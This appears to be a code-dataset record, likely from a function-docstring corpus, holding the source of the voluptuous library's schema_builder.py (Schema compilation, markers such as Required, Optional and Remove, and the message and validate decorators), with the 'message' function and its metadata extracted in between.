extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
def _compile_scalar(schema):
"""A scalar value.
The schema can either be a value or a type.
>>> _compile_scalar(int)([], 1)
1
>>> with raises(er.Invalid, 'expected float'):
... _compile_scalar(float)([], '1')
Callables have
>>> _compile_scalar(lambda v: float(v))([], '1')
1.0
As a convenience, ValueError's are trapped:
>>> with raises(er.Invalid, 'not a valid value'):
... _compile_scalar(lambda v: float(v))([], 'a')
"""
if inspect.isclass(schema):
def validate_instance(path, data):
if isinstance(data, schema):
return data
else:
msg = 'expected %s' % schema.__name__
raise er.TypeInvalid(msg, path)
return validate_instance
if callable(schema):
def validate_callable(path, data):
try:
return schema(data)
except ValueError as e:
raise er.ValueInvalid('not a valid value', path)
except er.Invalid as e:
e.prepend(path)
raise
return validate_callable
def validate_value(path, data):
if data != schema:
raise er.ScalarInvalid('not a valid value', path)
return data
return validate_value
def _compile_itemsort():
'''return sort function of mappings'''
def is_extra(key_):
return key_ is Extra
def is_remove(key_):
return isinstance(key_, Remove)
def is_marker(key_):
return isinstance(key_, Marker)
def is_type(key_):
return inspect.isclass(key_)
def is_callable(key_):
return callable(key_)
# priority list for map sorting (in order of checking)
# We want Extra to match last, because it's a catch-all. On the other hand,
# Remove markers should match first (since invalid values will not
# raise an Error, instead the validator will check if other schemas match
# the same value).
priority = [(1, is_remove), # Remove highest priority after values
(2, is_marker), # then other Markers
(4, is_type), # types/classes lowest before Extra
(3, is_callable), # callables after markers
(5, is_extra)] # Extra lowest priority
def item_priority(item_):
key_ = item_[0]
for i, check_ in priority:
if check_(key_):
return i
# values have hightest priorities
return 0
return item_priority
_sort_item = _compile_itemsort()
def _iterate_mapping_candidates(schema):
"""Iterate over schema in a meaningful order."""
# Without this, Extra might appear first in the iterator, and fail to
# validate a key even though it's a Required that has its own validation,
# generating a false positive.
return sorted(iteritems(schema), key=_sort_item)
class Msg(object):
"""Report a user-friendly message if a schema fails to validate.
>>> validate = Schema(
... Msg(['one', 'two', int],
... 'should be one of "one", "two" or an integer'))
>>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
... validate(['three'])
Messages are only applied to invalid direct descendants of the schema:
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
>>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
... validate([['three']])
The type which is thrown can be overridden but needs to be a subclass of Invalid
>>> with raises(er.SchemaError, 'Msg can only use subclases of Invalid as custom class'):
... validate = Schema(Msg([int], 'should be int', cls=KeyError))
If you do use a subclass of Invalid, that error will be thrown (wrapped in a MultipleInvalid)
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
>>> try:
... validate(['three'])
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], er.RangeInvalid)
"""
def __init__(self, schema, msg, cls=None):
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("Msg can only use subclases of"
" Invalid as custom class")
self._schema = schema
self.schema = Schema(schema)
self.msg = msg
self.cls = cls
def __call__(self, v):
try:
return self.schema(v)
except er.Invalid as e:
if len(e.path) > 1:
raise e
else:
raise (self.cls or er.Invalid)(self.msg)
def __repr__(self):
return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
"""Indicate that we should work with attributes, not keys."""
def __init__(self, schema, cls=UNDEFINED):
self.cls = cls
super(Object, self).__init__(schema)
class VirtualPathComponent(str):
def __str__(self):
return '<' + self + '>'
def __repr__(self):
return self.__str__()
# Markers.py
class Marker(object):
"""Mark nodes for special treatment."""
def __init__(self, schema_, msg=None, description=None):
self.schema = schema_
self._schema = Schema(schema_)
self.msg = msg
self.description = description
def __call__(self, v):
try:
return self._schema(v)
except er.Invalid as e:
if not self.msg or len(e.path) > 1:
raise
raise er.Invalid(self.msg)
def __str__(self):
return str(self.schema)
def __repr__(self):
return repr(self.schema)
def __lt__(self, other):
if isinstance(other, Marker):
return self.schema < other.schema
return self.schema < other
def __hash__(self):
return hash(self.schema)
def __eq__(self, other):
return self.schema == other
def __ne__(self, other):
return not(self.schema == other)
class Optional(Marker):
"""Mark a node in the schema as optional, and optionally provide a default
>>> schema = Schema({Optional('key'): str})
>>> schema({})
{}
>>> schema = Schema({Optional('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Optional('key', default=list): list})
>>> schema({})
{'key': []}
If 'required' flag is set for an entire schema, optional keys aren't required
>>> schema = Schema({
... Optional('key'): str,
... 'key2': str
... }, required=True)
>>> schema({'key2':'value'})
{'key2': 'value'}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Optional, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Exclusive(Optional):
"""Mark a node in the schema as exclusive.
Exclusive keys inherited from Optional:
>>> schema = Schema({Exclusive('alpha', 'angles'): int, Exclusive('beta', 'angles'): int})
>>> schema({'alpha': 30})
{'alpha': 30}
Keys inside a same group of exclusion cannot be together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
... schema({'alpha': 30, 'beta': 45})
For example, API can provides multiple types of authentication, but only one works in the same time:
>>> msg = 'Please, use only one type of authentication at the same time.'
>>> schema = Schema({
... Exclusive('classic', 'auth', msg=msg):{
... Required('email'): basestring,
... Required('password'): basestring
... },
... Exclusive('internal', 'auth', msg=msg):{
... Required('secret_key'): basestring
... },
... Exclusive('social', 'auth', msg=msg):{
... Required('social_network'): basestring,
... Required('token'): basestring
... }
... })
>>> with raises(er.MultipleInvalid, "Please, use only one type of authentication at the same time. @ data[<auth>]"):
... schema({'classic': {'email': 'foo@example.com', 'password': 'bar'},
... 'social': {'social_network': 'barfoo', 'token': 'tEMp'}})
"""
def __init__(self, schema, group_of_exclusion, msg=None, description=None):
super(Exclusive, self).__init__(schema, msg=msg,
description=description)
self.group_of_exclusion = group_of_exclusion
class Inclusive(Optional):
""" Mark a node in the schema as inclusive.
Inclusive keys inherited from Optional:
>>> schema = Schema({
... Inclusive('filename', 'file'): str,
... Inclusive('mimetype', 'file'): str
... })
>>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
>>> data == schema(data)
True
Keys inside a same group of inclusive must exist together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
... schema({'filename': 'dog.jpg'})
If none of the keys in the group are present, it is accepted:
>>> schema({})
{}
For example, API can return 'height' and 'width' together, but not separately.
>>> msg = "Height and width must exist together"
>>> schema = Schema({
... Inclusive('height', 'size', msg=msg): int,
... Inclusive('width', 'size', msg=msg): int
... })
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'height': 100})
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'width': 100})
>>> data = {'height': 100, 'width': 100}
>>> data == schema(data)
True
"""
def __init__(self, schema, group_of_inclusion,
msg=None, description=None, default=UNDEFINED):
super(Inclusive, self).__init__(schema, msg=msg,
default=default,
description=description)
self.group_of_inclusion = group_of_inclusion
class Required(Marker):
"""Mark a node in the schema as being required, and optionally provide a default value.
>>> schema = Schema({Required('key'): str})
>>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
... schema({})
>>> schema = Schema({Required('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Required('key', default=list): list})
>>> schema({})
{'key': []}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Required, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Remove(Marker):
"""Mark a node in the schema to be removed and excluded from the validated
output. Keys that fail validation will not raise ``Invalid``. Instead, these
keys will be treated as extras.
>>> schema = Schema({str: int, Remove(int): str})
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
... schema({'keep': 1, 1: 1.0})
>>> schema({1: 'red', 'red': 1, 2: 'green'})
{'red': 1}
>>> schema = Schema([int, Remove(float), Extra])
>>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
[1, 2, 3, 5, '7']
"""
def __call__(self, v):
super(Remove, self).__call__(v)
return self.__class__
def __repr__(self):
return "Remove(%r)" % (self.schema,)
def __hash__(self):
return object.__hash__(self)
def message(default=None, cls=None):
"""Convenience decorator to allow functions to provide a message.
Set a default message:
>>> @message('not an integer')
... def isint(v):
... return int(v)
>>> validate = Schema(isint())
>>> with raises(er.MultipleInvalid, 'not an integer'):
... validate('a')
The message can be overridden on a per validator basis:
>>> validate = Schema(isint('bad'))
>>> with raises(er.MultipleInvalid, 'bad'):
... validate('a')
The class thrown too:
>>> class IntegerInvalid(er.Invalid): pass
>>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
>>> try:
... validate('a')
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], IntegerInvalid)
"""
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("message can only use subclases of Invalid as custom class")
def decorator(f):
@wraps(f)
def check(msg=None, clsoverride=None):
@wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except ValueError:
raise (clsoverride or cls or er.ValueInvalid)(msg or default or 'invalid value')
return wrapper
return check
return decorator
def _args_to_dict(func, args):
"""Returns argument names as values as key-value pairs."""
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments
def _merge_args_with_kwargs(args_dict, kwargs_dict):
"""Merge args with kwargs."""
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret
def validate(*a, **kw):
"""Decorator for validating arguments of a function against a given schema.
Set restrictions for arguments:
>>> @validate(arg1=int, arg2=int)
... def foo(arg1, arg2):
... return arg1 * arg2
Set restriction for returned value:
>>> @validate(arg=int, __return__=int)
... def bar(arg1):
... return arg1 * 2
"""
RETURNS_KEY = '__return__'
def validate_schema_decorator(func):
returns_defined = False
returns = None
schema_args_dict = _args_to_dict(func, a)
schema_arguments = _merge_args_with_kwargs(schema_args_dict, kw)
if RETURNS_KEY in schema_arguments:
returns_defined = True
returns = schema_arguments[RETURNS_KEY]
del schema_arguments[RETURNS_KEY]
input_schema = (Schema(schema_arguments, extra=ALLOW_EXTRA)
if len(schema_arguments) != 0 else lambda x: x)
output_schema = Schema(returns) if returns_defined else lambda x: x
@wraps(func)
def func_wrapper(*args, **kwargs):
args_dict = _args_to_dict(func, args)
arguments = _merge_args_with_kwargs(args_dict, kwargs)
validated_arguments = input_schema(arguments)
output = func(**validated_arguments)
return output_schema(output)
return func_wrapper
return validate_schema_decorator
|
alecthomas/voluptuous | voluptuous/schema_builder.py | message | python | def message(default=None, cls=None):
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("message can only use subclases of Invalid as custom class")
def decorator(f):
@wraps(f)
def check(msg=None, clsoverride=None):
@wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except ValueError:
raise (clsoverride or cls or er.ValueInvalid)(msg or default or 'invalid value')
return wrapper
return check
return decorator | Convenience decorator to allow functions to provide a message.
Set a default message:
>>> @message('not an integer')
... def isint(v):
... return int(v)
>>> validate = Schema(isint())
>>> with raises(er.MultipleInvalid, 'not an integer'):
... validate('a')
The message can be overridden on a per validator basis:
>>> validate = Schema(isint('bad'))
>>> with raises(er.MultipleInvalid, 'bad'):
... validate('a')
The class thrown too:
>>> class IntegerInvalid(er.Invalid): pass
>>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
>>> try:
... validate('a')
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], IntegerInvalid) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L1185-L1230 | null | import collections
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
if sys.version_info >= (3,):
long = int
unicode = str
basestring = str
ifilter = filter
def iteritems(d):
return d.items()
else:
from itertools import ifilter
def iteritems(d):
return d.iteritems()
if sys.version_info >= (3, 3):
_Mapping = collections.abc.Mapping
else:
_Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
def __nonzero__(self):
return False
def __repr__(self):
return '...'
UNDEFINED = Undefined()
def Self():
raise er.SchemaError('"Self" should never be called')
def default_factory(value):
if value is UNDEFINED or callable(value):
return value
return lambda: value
@contextmanager
def raises(exc, msg=None, regex=None):
try:
yield
except exc as e:
if msg is not None:
assert str(e) == msg, '%r != %r' % (str(e), msg)
if regex is not None:
assert re.search(regex, str(e)), '%r does not match %r' % (str(e), regex)
def Extra(_):
"""Allow keys in the data that are not present in the schema."""
raise er.SchemaError('"Extra" should never be called')
# As extra() is never called there's no way to catch references to the
# deprecated object, so we just leave an alias here instead.
extra = Extra
class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
